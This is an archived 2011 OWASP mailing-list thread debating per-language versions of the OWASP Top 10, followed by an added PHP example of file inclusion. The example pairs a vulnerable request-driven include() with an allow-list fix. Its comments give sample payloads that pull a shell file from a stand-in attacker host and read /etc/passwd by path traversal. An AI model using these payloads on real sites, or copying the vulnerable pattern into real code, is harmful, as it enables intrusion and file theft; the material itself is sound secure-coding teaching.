[Owasp-leaders] OWASP Top 10 2012

Mark Curphey mark at curphey.com
Fri Oct 7 11:01:06 EDT 2011


I have always hoped for an unbiased architectural reference of how the frameworks deal with things. Ruby has 3 safe modes for sandboxing from the OS, .NET the CLR, Java the JVM, etc. This is a big job but would be massively valuable, and all frameworks have this, so the effort would be normalizing data.

Sent from my iPhone

On Oct 7, 2011, at 7:54 AM, Chris Schmidt <chris.schmidt at owasp.org> wrote:

> I agree with you to an extent Dave. However, I think there are some distinct ordering differences between the languages as well. For instance, it is pretty rare that I have seen Remote/Local File Inclusion bugs in Java or .Net apps, whereas they are found in PHP apps quite a bit more frequently. I would say the same even about SQL Injection, except that I think I have seen a good deal more in .Net and PHP than in Java. While there will definitely be quite a bit of crossover between the overall top 10 and the language top 10s, I believe that there are enough differences in order and risk associated with the issues to warrant more granular documents to complement the master top 10. I also believe there should be cohesiveness between these documents, however. For instance, I may be looking at SQL Injection for .Net and think to myself, I wonder if my org also has this same issue in our Java or .Net applications.
> 
> I think there is value in doing this - if nothing else I think there is some research/metrics value in the discovery process, even if the outcome of that discovery process indicates that separation is not worth the effort investment. 
> 
> I believe that I have seen some numbers out of the whitehat crew that could provide some initial insight into the intersections and pieces across different languages and frameworks.
> 
> On 10/7/2011 8:44 AM, Erwin Geirnaert wrote:
>> 
>> Hi Dave,
>> 
>> That's what I did with the OWASP Top 10 for JEE 2007 where I only described the issue for JEE and the necessary countermeasures.
>> But the Top 10 used was the general one, and not specific for Java, so for example you have the concept of malicious file execution, where you include a PHP file from a malicious origin via a parameter, and that doesn't apply to Java or .NET.
>> 
>> Discussing with a Java hardcore developer that Spring Security is not really a solution for the OWASP Top 10 is a difficult job :)
>> 
>> Best regards,
>> 
>> Erwin
>> 
>> From: Dave Wichers <dave.wichers at owasp.org>
>> Date: Fri, 7 Oct 2011 07:39:07 -0700
>> To: 'Venkatesh Jagannathan' <venki at owasp.org>, Erwin Geirnaert <erwin.geirnaert at zionsecurity.com>
>> CC: "owasp-leaders at lists.owasp.org" <owasp-leaders at lists.owasp.org>
>> Subject: RE: [Owasp-leaders] OWASP Top 10 2012
>> 
>> I agree with Venkatesh here. I actually think .NET is MORE secure than Java in many respects. However, I think because Microsoft actually tried to build some security into .NET in certain areas, like automatic XSS defenses, they shot themselves in the foot to some degree because they provided .Net developers with a false sense of security in that area. Since their anti-XSS mechanism wasn’t actually bullet proof, it actually ended up causing .NET apps to have MORE XSS vulns than Java apps on average. However, the .NET developers got this ‘benefit’ for free, i.e., they didn’t have to do anything to get to their level of XSS vulns, but the Java developers had to work really hard to actually get their XSS vuln count down because Java had no built in anti-XSS defenses. If you built the same App in both Java and .NET and the developers didn’t specifically try to stop XSS vulns, the .NET app would actually have far less XSS than the Java one.
>>  
>> I’m not a PHP expert so I can’t comment there.
>>  
>> Rather than having a ‘different’ Top 10 for each language, I think it WOULD be really cool to have a document like, How to address the OWASP Top 10 in Java/.NET/PHP, etc. Then the docs would be aligned with each other, rather than out of sync/different order/etc., which would be very confusing. However, if I was a developer for language X, and there was a Top 10 for that language, that would be very helpful for me, and not confusing since it covers the same stuff as the ‘standard’ Top 10.
>>  
>> What do you think about this variant on your idea?
>>  
>> -Dave
>>  
>> From: owasp-leaders-bounces at lists.owasp.org [mailto:owasp-leaders-bounces at lists.owasp.org] On Behalf Of Venkatesh Jagannathan
>> Sent: Friday, October 07, 2011 10:29 AM
>> To: Erwin Geirnaert
>> Cc: owasp-leaders at lists.owasp.org
>> Subject: Re: [Owasp-leaders] OWASP Top 10 2012
>>  
>> Hi Erwin,
>>     I slightly disagree here. Whatever issue is present in .NET, the same can be replicated very much in Java. When I give training on writing secure code, based on the top 10, I provide samples in both the .NET and Java way.
>> To me, creating separate material for Java/.NET would at some point in time end up in too many "issuelets" that are language specific and dilute the concept of the OWASP top 10.
>>  
>> I think the way we should address this is: providing examples in all languages would make more sense than creating one for each language :)
>>  
>> Thanks & Regards,
>> ~Venki
>> 
>> On Fri, Oct 7, 2011 at 7:47 PM, Erwin Geirnaert <erwin.geirnaert at zionsecurity.com> wrote:
>> Hi list,
>>  
>> During some discussions this week with Java developers while giving a security training I got the following remark: "why are there so many ASP.NET/PHP issues in the OWASP Top 10, is Java more secure"?
>>  
>> So what I propose is to create a specific OWASP Top 10 for different technologies: Microsoft, Java, PHP and we can still have one global Top 10.
>> Of course based on the CVE database, but it will be clearer for the developers, and I think that the OWASP Top 10 for Java will be very different from the OWASP Top 10 for PHP.
>>  
>> Best regards,
>>  
>> Erwin
>> 
>> _______________________________________________
>> OWASP-Leaders mailing list
>> OWASP-Leaders at lists.owasp.org
>> https://lists.owasp.org/mailman/listinfo/owasp-leaders
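
Added illustration, not part of any message in the thread above: the Remote/Local File Inclusion pattern Chris and Erwin refer to (a PHP include driven by a request parameter), shown as the vulnerable form beside an allow-list version. The `page` parameter, the template file names and the payload URLs are assumptions made for this example, not anything taken from the thread.

```php
<?php
// Added example of the PHP file-inclusion pattern discussed in the thread.
// Not code from any participant's message. The 'page' parameter, the template
// paths and the sample payloads are assumptions for illustration.

// Vulnerable: the request parameter is handed straight to include().
// With allow_url_include=On (php.ini, Off by default) this is Remote File
// Inclusion:   ?page=http://attacker.example/shell.txt
// With it Off it is still Local File Inclusion / path traversal, since
// include() of a file without PHP tags simply outputs its contents:
//              ?page=../../../../etc/passwd
function render_vulnerable(array $get): void
{
    $page = $get['page'] ?? 'templates/home.php';
    include $page;                     // attacker controls the path entirely
}

// Hardened: map the untrusted parameter onto a fixed allow-list of known
// templates and refuse everything else. The raw value never reaches include().
const TEMPLATES = [
    'home'    => 'templates/home.php',
    'about'   => 'templates/about.php',
    'contact' => 'templates/contact.php',
];

function resolve_template(?string $page): ?string
{
    $page = $page ?? 'home';
    return TEMPLATES[$page] ?? null;   // exact key match only; no concatenation
}

function render_hardened(array $get): void
{
    $path = resolve_template($get['page'] ?? null);
    if ($path === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include $path;
}

// Constructed inputs: the allow-list rejects both the RFI and the LFI payload
// and accepts only the known keys.
foreach (['home', 'about', '../../../../etc/passwd', 'http://attacker.example/shell.txt'] as $p) {
    $resolved = resolve_template($p);
    printf("%-40s -> %s\n", $p, $resolved ?? 'rejected');
}
```

The point of the allow-list is that the parameter is used as a lookup key, never as a path fragment; string prefixing or extension appending is not a substitute, because traversal sequences and stream wrappers survive concatenation. Disabling `allow_url_include` closes the remote variant but leaves the local one, which is why the lookup is needed either way.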